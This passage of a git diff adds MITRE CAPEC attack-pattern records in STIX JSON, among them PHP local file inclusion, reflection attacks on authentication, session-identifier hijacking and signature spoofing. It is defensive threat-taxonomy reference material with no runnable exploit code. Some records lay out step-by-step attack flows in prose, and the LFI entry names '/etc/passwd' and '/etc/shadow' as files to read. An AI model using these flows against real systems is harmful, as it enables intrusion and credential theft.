an adversary with access and necessary technical skills maliciously alters a chip’s intended program logic to produce an effect intended by the adversary when the fully manufactured chip is deployed and in operational use. Intended effects can include the ability of the adversary to remotely control a host system to carry out malicious acts.\n ", + "external_references": [ + { + "external_id": "CAPEC-672", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/672.html" + }, + { + "description": "Supply Chain Compromise: Compromise Hardware Supply Chain", + "external_id": "T1195.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/003" + }, + { + "description": "Jeremy Muldavin, Assuring Microelectronics Innovation for National Security & Economic Competitiveness (MINSEC), 2017--11, Office of the Deputy Assistant Secretary of Defense for Systems Engineering", + "external_id": "REF-662", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--2150c989-e9a0-4aef-8019-8d60f6fcaeeb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Malicious Code Implanted During Chip Programming", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_consequences": { + "Integrity": [ + "Alter Execution Logic" + ] + }, + "x_capec_domains": [ + "Supply Chain", + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "\n Following a chip’s production process steps of test and verification and validation of chip circuitry, an adversary involved in the generation of microcode defining the chip’s function(s) inserts a malicious instruction that will become part of the chip’s program. When integrated into a system, the chip will produce an effect intended by the adversary.\n " + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "An adversary would need to have access to a foundry’s or chip maker’s development/production environment where programs for specific chips are developed, managed and uploaded into targeted chips prior to distribution or sale." + ], + "x_capec_skills_required": { + "Medium": "An adversary needs to be skilled in microprogramming, manipulation of configuration management systems, and in the operation of tools used for the uploading of programs into chips during manufacture. Uploading can be for individual chips or performed on a large scale basis." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--2166d3c5-baec-4f42-8284-c1b5b649ad34.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--2166d3c5-baec-4f42-8284-c1b5b649ad34.json new file mode 100644 index 0000000000000000000000000000000000000000..5058e9b8cbae9508f8cabee47e6eb8c23a97f8c7 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--2166d3c5-baec-4f42-8284-c1b5b649ad34.json @@ -0,0 +1,47 @@ +{ + "id": "bundle--a14c3251-f302-41ba-a5dd-34e3a3599bb3", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary subverts a communications protocol to perform an attack. This type of attack can allow an adversary to impersonate others, discover sensitive information, control the outcome of a session, or perform other attacks. This type of attack targets invalid assumptions that may be inherent in implementers of the protocol, incorrect implementations of the protocol, or vulnerabilities in the protocol itself.", + "external_references": [ + { + "external_id": "CAPEC-272", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/272.html" + } + ], + "id": "attack-pattern--2166d3c5-baec-4f42-8284-c1b5b649ad34", + "modified": "2014-06-23T00:00:00.000Z", + "name": "Protocol Manipulation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--9c983530-1927-43ca-addd-63d149cda4a7", + "attack-pattern--a46718a5-0206-44da-a4f8-b1943f85188b", + "attack-pattern--1809fa36-f249-4e55-80ab-26570fd24cab", + "attack-pattern--b6f5248a-346f-484f-8091-8ab84288aa81", + "attack-pattern--229804f0-b017-4a26-937b-159da866bf9a" + ], + "x_capec_prerequisites": [ + "The protocol or implementations thereof must contain bugs that an adversary can exploit." + ], + "x_capec_resources_required": [ + "In some variants of this attack the adversary must be able to intercept communications using the protocol. This means they need to be able to receive the communications from one participant and prevent the other participant from receiving these communications." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--21fcd732-cb8b-4716-b74e-abdf6b031e14.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--21fcd732-cb8b-4716-b74e-abdf6b031e14.json new file mode 100644 index 0000000000000000000000000000000000000000..080a334205783d54e59f3141887528c8ab4f2e8a --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--21fcd732-cb8b-4716-b74e-abdf6b031e14.json @@ -0,0 +1,29 @@ +{ + "id": "bundle--60a5ffd8-9fae-4474-8f43-548f84e55b87", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack pattern has been deprecated.", + "external_references": [ + { + "external_id": "CAPEC-432", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/432.html" + } + ], + "id": "attack-pattern--21fcd732-cb8b-4716-b74e-abdf6b031e14", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: Target Influence via Voice in NLP", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--2231936f-0dda-4736-a089-9e734231907c.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--2231936f-0dda-4736-a089-9e734231907c.json new file mode 100644 index 0000000000000000000000000000000000000000..63436b346ddbaf25911b4ae581cb433eb5ec98c2 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--2231936f-0dda-4736-a089-9e734231907c.json @@ -0,0 +1,73 @@ +{ + "id": "bundle--b6b67366-ccf0-4998-bc7b-2a97049e6b96", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary engages in activities to discover any sensitive constants present within the compiled code of an executable. These constants may include literal ASCII strings within the file itself, or possibly strings hard-coded into particular routines that can be revealed by code refactoring methods including static and dynamic analysis.\n ", + "external_references": [ + { + "external_id": "CAPEC-191", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/191.html" + }, + { + "external_id": "CWE-798", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/798.html" + }, + { + "description": "Unsecured Credentials:Credentials in files", + "external_id": "T1552.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1552/001" + }, + { + "description": "Wikipedia, The Wikimedia Foundation, Inc", + "external_id": "REF-51", + "source_name": "reference_from_CAPEC", + "url": "http://en.wikipedia.org/wiki/Decompiler" + }, + { + "description": "Wikipedia, The Wikimedia Foundation, Inc", + "external_id": "REF-52", + "source_name": "reference_from_CAPEC", + "url": "http://en.wikipedia.org/wiki/Debugger" + }, + { + "description": "Wikipedia, The Wikimedia Foundation, Inc", + "external_id": "REF-53", + "source_name": "reference_from_CAPEC", + "url": "http://en.wikipedia.org/wiki/Disassembler" + } + ], + "id": "attack-pattern--2231936f-0dda-4736-a089-9e734231907c", + "modified": "2022-02-22T00:00:00.000Z", + "name": "Read Sensitive Constants Within an Executable", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--d17eb5a5-1361-4e13-a969-e4d587d13b3d" + ], + "x_capec_domains": [ + "Software", + "Physical Security" + ], + "x_capec_extended_description": "\n One specific example of a sensitive string is a hard-coded password. Typical examples of software with hard-coded passwords include server-side executables which may check for a hard-coded password or key during a user's authentication with the server. Hard-coded passwords can also be present in client-side executables which utilize the password or key when connecting to either a remote component, such as a database server, licensing server, or otherwise, or a processes on the same host that expects a key or password. When analyzing an executable the adversary may search for the presence of such strings by analyzing the byte-code of the file itself. Example utilities for revealing strings within a file include 'strings,' 'grep,' or other variants of these programs depending upon the type of operating system used. These programs can be used to dump any ASCII or UNICODE strings contained within a program. Strings can also be searched for using a hex editors by loading the binary or object code file and utilizing native search functions such as regular expressions.\n Additionally, sensitive numeric values can occur within an executable. This can be used to discover the location of cryptographic constants.\n ", + "x_capec_prerequisites": [ + "Access to a binary or executable such that it can be analyzed by various utilities." + ], + "x_capec_resources_required": [ + "Binary analysis programs such as 'strings' or 'grep', or hex editors." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--229804f0-b017-4a26-937b-159da866bf9a.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--229804f0-b017-4a26-937b-159da866bf9a.json new file mode 100644 index 0000000000000000000000000000000000000000..583f9d1fa1cc9f586afd4d35ce4a65c7ea520c9e --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--229804f0-b017-4a26-937b-159da866bf9a.json @@ -0,0 +1,76 @@ +{ + "id": "bundle--9a0c639f-6745-4664-aa5d-c4de59966a92", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary can abuse an authentication protocol susceptible to reflection attack in order to defeat it. Doing so allows the adversary illegitimate access to the target system, without possessing the requisite credentials. Reflection attacks are of great concern to authentication protocols that rely on a challenge-handshake or similar mechanism. An adversary can impersonate a legitimate user and can gain illegitimate access to the system by successfully mounting a reflection attack during authentication.", + "external_references": [ + { + "external_id": "CAPEC-90", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/90.html" + }, + { + "external_id": "CWE-301", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/301.html" + }, + { + "external_id": "CWE-303", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/303.html" + } + ], + "id": "attack-pattern--229804f0-b017-4a26-937b-159da866bf9a", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Reflection Attack in Authentication Protocol", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--2166d3c5-baec-4f42-8284-c1b5b649ad34", + "attack-pattern--2e2ed1f8-f736-4fc9-83bc-308595fc6e03" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Gain Privileges", + "Bypass Protection Mechanism" + ], + "Confidentiality": [ + "Gain Privileges", + "Bypass Protection Mechanism", + "Read Data" + ] + }, + "x_capec_domains": [ + "Communications" + ], + "x_capec_example_instances": [ + "\n A single sign-on solution for a network uses a fixed pre-shared key with its clients to initiate the sign-on process in order to avoid eavesdropping on the initial exchanges.\n An attacker can use a reflection attack to mimic a trusted client on the network to participate in the sign-on exchange.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify service with vulnerable handshake authentication: The adversary must first identify a vulnerable authentication protocol. The most common indication of an authentication protocol vulnerable to reflection attack is when the client initiates the handshake, rather than the server. This allows the client to get the server to encrypt targeted data using the server's pre-shared key.

Experiment

  1. Send challenge to target server: The adversary opens a connection to the target server and sends it a challenge. This challenge is arbitrary and is simply used as a placeholder for the protocol in order to get the server to respond.

  2. Receive server challenge: The server responds by returning the challenge sent encrypted with the server's pre-shared key, as well as its own challenge to the attacker sent in plaintext. We will call this challenge sent by the server \"C\". C is very important and is stored off by the adversary for the next step.

  3. Initiate second handshake: Since the adversary does not possess the pre-shared key, they cannot encrypt C from the previous step in order for the server to authenticate them. To get around this, the adversary initiates a second connection to the server while still keeping the first connection alive. In the second connection, the adversary sends C as the initial client challenge, which rather than being arbitary like the first connection, is very intentional.

  4. Receive encrypted challenge: The server treats the intial client challenge in connection two as an arbitrary client challenge and responds by encrypting C with the pre-shared key. The server also sends a new challenge. The adversary ignores the server challenge and stores the encrypted version of C. The second connection is either terminated or left to expire by the adversary as it is no longer needed.

Exploit

  1. The adversary now posseses the encrypted version of C that is obtained through connection two. The adversary continues the handshake in connection one by responding to the server with the encrypted version of C, verifying that they have access to the pre-shared key (when they actually do not). Because the server uses the same pre-shared key for all authentication it will decrypt C and authenticate the adversary for the first connection, giving the adversary illegitimate access to the target system.

", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The attacker must have direct access to the target server in order to successfully mount a reflection attack. An intermediate entity, such as a router or proxy, that handles these exchanges on behalf of the attacker inhibits the attackers' ability to attack the authentication protocol." + ], + "x_capec_resources_required": [ + "All that the attacker requires is a means to observe and understand the protocol exchanges in order to reflect the challenges appropriately." + ], + "x_capec_skills_required": { + "Medium": "The attacker needs to have knowledge of observing the protocol exchange and managing the required connections in order to issue and respond to challenges" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--22a65c6a-9498-4e7f-a03a-030ab1c907dc.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--22a65c6a-9498-4e7f-a03a-030ab1c907dc.json new file mode 100644 index 0000000000000000000000000000000000000000..1ca5d26b9f5a9a8aa8535fc9365c4d186234bded --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--22a65c6a-9498-4e7f-a03a-030ab1c907dc.json @@ -0,0 +1,73 @@ +{ + "id": "bundle--5d8e103e-4fb3-4d8a-ad5f-7af0aaecd7c7", + "objects": [ + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary engages in active probing and exploration activities to determine security information about a remote target system. Often times adversaries will rely on remote applications that can be probed for system configurations.", + "external_references": [ + { + "external_id": "CAPEC-580", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/580.html" + }, + { + "external_id": "CWE-204", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/204.html" + }, + { + "external_id": "CWE-205", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/205.html" + }, + { + "external_id": "CWE-208", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/208.html" + }, + { + "description": "System Information Discovery", + "external_id": "T1082", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1082" + } + ], + "id": "attack-pattern--22a65c6a-9498-4e7f-a03a-030ab1c907dc", + "modified": "2023-01-24T00:00:00.000Z", + "name": "System Footprinting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--87b0d2df-b246-4bf9-aee8-4912e2fa1a30" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_parent_of_refs": [ + "attack-pattern--c95fac2f-4305-4235-9228-a0551ec75c70", + "attack-pattern--94208f8a-f779-4be5-a97b-d9ab781a3f5e" + ], + "x_capec_prerequisites": [ + "The adversary must have logical access to the target network and system." + ], + "x_capec_skills_required": { + "Low": "The adversary needs to know basic linux commands." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--2351ee64-dd85-4bc3-bb43-aaa2ca5c1228.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--2351ee64-dd85-4bc3-bb43-aaa2ca5c1228.json new file mode 100644 index 0000000000000000000000000000000000000000..52e53808d6b168bd6c471739bb93996208a465ad --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--2351ee64-dd85-4bc3-bb43-aaa2ca5c1228.json @@ -0,0 +1,141 @@ +{ + "id": "bundle--ff6a5ea6-5759-4fad-8636-7c01142513ec", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary guesses, obtains, or \"rides\" a trusted identifier (e.g. session ID, resource ID, cookie, etc.) to perform authorized actions under the guise of an authenticated user or service.\n ", + "external_references": [ + { + "external_id": "CAPEC-21", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/21.html" + }, + { + "external_id": "CWE-290", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/290.html" + }, + { + "external_id": "CWE-302", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/302.html" + }, + { + "external_id": "CWE-346", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/346.html" + }, + { + "external_id": "CWE-539", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/539.html" + }, + { + "external_id": "CWE-6", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/6.html" + }, + { + "external_id": "CWE-384", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/384.html" + }, + { + "external_id": "CWE-664", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/664.html" + }, + { + "external_id": "CWE-602", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/602.html" + }, + { + "external_id": "CWE-642", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/642.html" + }, + { + "description": "Access Token Manipulation", + "external_id": "T1134", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1134" + }, + { + "description": "Steal Application Access Token", + "external_id": "T1528", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1528" + }, + { + "description": "Steal Web Session Cookie", + "external_id": "T1539", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1539" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--2351ee64-dd85-4bc3-bb43-aaa2ca5c1228", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Exploitation of Trusted Identifiers", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n Thin client applications like web applications are particularly vulnerable to session ID attacks. Since the server has very little control over the client, but still must track sessions, data, and objects on the server side, cookies and other mechanisms have been used to pass the key to the session data between the client and server. When these session keys are compromised it is trivial for an adversary to impersonate a user's session in effect, have the same capabilities as the authorized user. There are two main ways for an adversary to exploit session IDs.\n A brute force attack involves an adversary repeatedly attempting to query the system with a spoofed session header in the HTTP request. A web server that uses a short session ID can be easily spoofed by trying many possible combinations so the parameters session-ID= 1234 has few possible combinations, and an adversary can retry several hundred or thousand request with little to no issue on their side.\n The second method is interception, where a tool such as wireshark is used to sniff the wire and pull off any unprotected session identifiers. The adversary can then use these variables and access the application.\n ", + "For example, in a message queuing system that allows service requesters to post messages to its queue through an open channel (such as anonymous FTP), authorization is done through checking group or role membership contained in the posted message. However, there is no proof that the message itself, the information in the message (such group or role membership), or the process that wrote the message to the queue is authentic and authorized to do so." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey the application for Indicators of Susceptibility: Using a variety of methods, until one is found that applies to the target, the adversary probes for cookies, session tokens, or entry points that bypass identifiers altogether.

    2. Techniques
    Spider all available pages
    Attack known bad interfaces
    Search outward-facing configuration and properties files for identifiers.

Experiment

  1. Fetch samples: The adversary fetches many samples of identifiers. This may be through legitimate access (logging in, legitimate connections, etc.) or via systematic probing.

    2. Techniques
    An adversary makes many anonymous connections and records the session IDs assigned.
    An adversary makes authorized connections and records the session tokens or credentials issued.
    An adversary gains access to (legitimately or illegitimately) a nearby system (e.g., in the same operations network, DMZ, or local network) and makes a connection from it, attempting to gain the same privileges as a trusted system.

Exploit

  1. Impersonate: An adversary can use successful experiments or authentications to impersonate an authorized user or system or to laterally move within a system or application

  2. Spoofing: Malicious data can be injected into the target system or into a victim user's system by an adversary. The adversary can also pose as a legitimate user to perform social engineering attacks.

  3. Data Exfiltration: The adversary can obtain sensitive data contained within the system or application.

", + "x_capec_extended_description": "\n Attacks leveraging trusted identifiers typically result in the adversary laterally moving within the local network, since users are often allowed to authenticate to systems/applications within the network using the same identifier. This allows the adversary to obtain sensitive data, download/install malware on the system, pose as a legitimate user for social engineering purposes, and more.\n Attacks on trusted identifiers take advantage of the fact that some software accepts user input without verifying its authenticity. Many server side processes are vulnerable to these attacks because the server to server communications have not been analyzed from a security perspective or the processes \"trust\" other systems because they are behind a firewall. Similarly, servers that use easy to guess or spoofable schemes for representing digital identity can also be vulnerable. Such systems frequently use schemes without cryptography and digital signatures (or with broken cryptography). Identifiers may be guessed or obtained due to insufficient randomness, poor protection (passed/stored in the clear), lack of integrity (unsigned), or improper correlation with access control policy enforcement points. Exposed configuration and properties files that contain sensitive data may additionally provide an adversary with the information needed to obtain these identifiers. An adversary may also \"ride\" an identifier via a malicious link, as is the case in Cross Site Request Forgery (CSRF) attacks.\n Regardless of the attack vector, successful spoofing and impersonation of trusted credentials can lead to an adversary breaking authentication, authorization, and audit controls with the target system or application.\n ", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--414d0884-4f46-4a51-b4ea-72125c7f5f9e", + "attack-pattern--56b4150a-10fd-42cd-85ff-1063625ec5f4", + "attack-pattern--63f43efb-7a34-4302-b3dc-8245100fdea9", + "attack-pattern--0939f361-ea31-454b-ae3d-4af2411b756d" + ], + "x_capec_prerequisites": [ + "Server software must rely on weak identifier proof and/or verification schemes.", + "Identifiers must have long lifetimes and potential for reusability.", + "Server software must allow concurrent sessions to exist." + ], + "x_capec_resources_required": [ + "Ability to deploy software on network.", + "Ability to communicate synchronously or asynchronously with server." + ], + "x_capec_skills_required": { + "Low": "To achieve a direct connection with the weak or non-existent server session access control, and pose as an authorized user" + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--d56469be-4ebc-4443-b85a-3097193df4c4.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--d56469be-4ebc-4443-b85a-3097193df4c4.json new file mode 100644 index 0000000000000000000000000000000000000000..c85a79c2be015dc3be6afabe9e469f34c8052fb1 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--d56469be-4ebc-4443-b85a-3097193df4c4.json @@ -0,0 +1,54 @@ +{ + "id": "bundle--67a68e63-2754-4502-986d-a1cc3a35453e", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The attacker loads and executes an arbitrary local PHP file on a target machine. The attacker could use this to try to load old versions of PHP files that have known vulnerabilities, to load PHP files that the attacker placed on the local machine during a prior attack, or to otherwise change the functionality of the targeted application in unexpected ways.", + "external_references": [ + { + "external_id": "CAPEC-252", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/252.html" + }, + { + "external_id": "CWE-829", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/829.html" + }, + { + "description": "OWASP Vulnerabilities, The Open Web Application Security Project (OWASP)", + "external_id": "REF-621", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-community/vulnerabilities/PHP_File_Inclusion" + } + ], + "id": "attack-pattern--d56469be-4ebc-4443-b85a-3097193df4c4", + "modified": "2021-10-21T00:00:00.000Z", + "name": "PHP Local File Inclusion", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--283d665d-e109-4d5d-8993-6fb25e5923d6" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey application: Using a browser or an automated tool, an adversary follows all public links on a web site. They record all the links they find. The adversary is looking for URLs that show PHP file inclusion is used, which can look something like \"http://vulnerable-website/file.php?file=index.php\".

    2. Techniques
    Use a spidering tool to follow and record all links. Make special note of any links that include parameters in the URL.
    Use a proxy tool to record all links visited during a manual traversal of the web application. Make special note of any links that include parameters in the URL. Manual traversal of this type is frequently necessary to identify forms that are GET method forms rather than POST forms.
    Use a browser to manually explore the website and analyze how it is constructed. Many browser's plugins are available to facilitate the analysis or automate the URL discovery.

Experiment

  1. Attempt variations on input parameters: Once the adversary finds a vulnerable URL that takes file input, they attempt a variety of path traversal techniques to attempt to get the application to display the contents of a local file, or execute a different PHP file already stored locally on the server.

    2. Techniques
    Use a list of probe strings to inject in parameters of known URLs. The probe strings are variants of path traversal techniques used to include well known files.
    Use a proxy tool to record results of manual input of local file inclusion probes in known URLs.

Exploit

  1. Include desired local file: Once the adversary has determined which techniques of path traversal successfully work with the vulnerable PHP application, they will target a specific local file to include. These can be files such as \"/etc/passwd\", \"/etc/shadow\", or configuration files for the application that might expose sensitive information.

", + "x_capec_prerequisites": [ + "The targeted PHP application must have a bug that allows an attacker to control which code file is loaded at some juncture." + ], + "x_capec_resources_required": [ + "The attacker needs to have enough access to the target application to control the identity of a locally included PHP file." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + } + ], + "type": "bundle" +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--d94762c1-3c78-47eb-8212-e0c770ba43a9.json b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--d94762c1-3c78-47eb-8212-e0c770ba43a9.json new file mode 100644 index 0000000000000000000000000000000000000000..eaad4fdc738af4ea46378e395cea01d266f98ae6 --- /dev/null +++ b/cti-ATT-CK-v13.1/capec/2.1/attack-pattern/attack-pattern--d94762c1-3c78-47eb-8212-e0c770ba43a9.json @@ -0,0 +1,90 @@ +{ + "id": "bundle--931b26a6-c34e-4658-9e98-1fa61c17e015", + "objects": [ + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker generates a message or datablock that causes the recipient to believe that the message or datablock was generated and cryptographically signed by an authoritative or reputable source, misleading a victim or victim operating system into performing malicious actions.", + "external_references": [ + { + "external_id": "CAPEC-473", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/473.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-327", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/327.html" + }, + { + "external_id": "CWE-290", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/290.html" + }, + { + "description": "Masquerading: Invalid Code Signature", + "external_id": "T1036.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1036/001" + }, + { + "description": "Subvert Trust Controls: Code Signing", + "external_id": "T1553.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1553/002" + } + ], + "id": "attack-pattern--d94762c1-3c78-47eb-8212-e0c770ba43a9", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Signature Spoof", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authentication": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "An attacker provides a victim with a malicious executable disguised as a legitimate executable from an established software by signing the executable with a forged cryptographic key. The victim's operating system attempts to verify the executable by checking the signature, the signature is considered valid, and the attackers' malicious executable runs.", + "An attacker exploits weaknesses in a cryptographic algorithm to that allow a private key for a legitimate software vendor to be reconstructed, attacker-created malicious software is cryptographically signed with the reconstructed key, and is 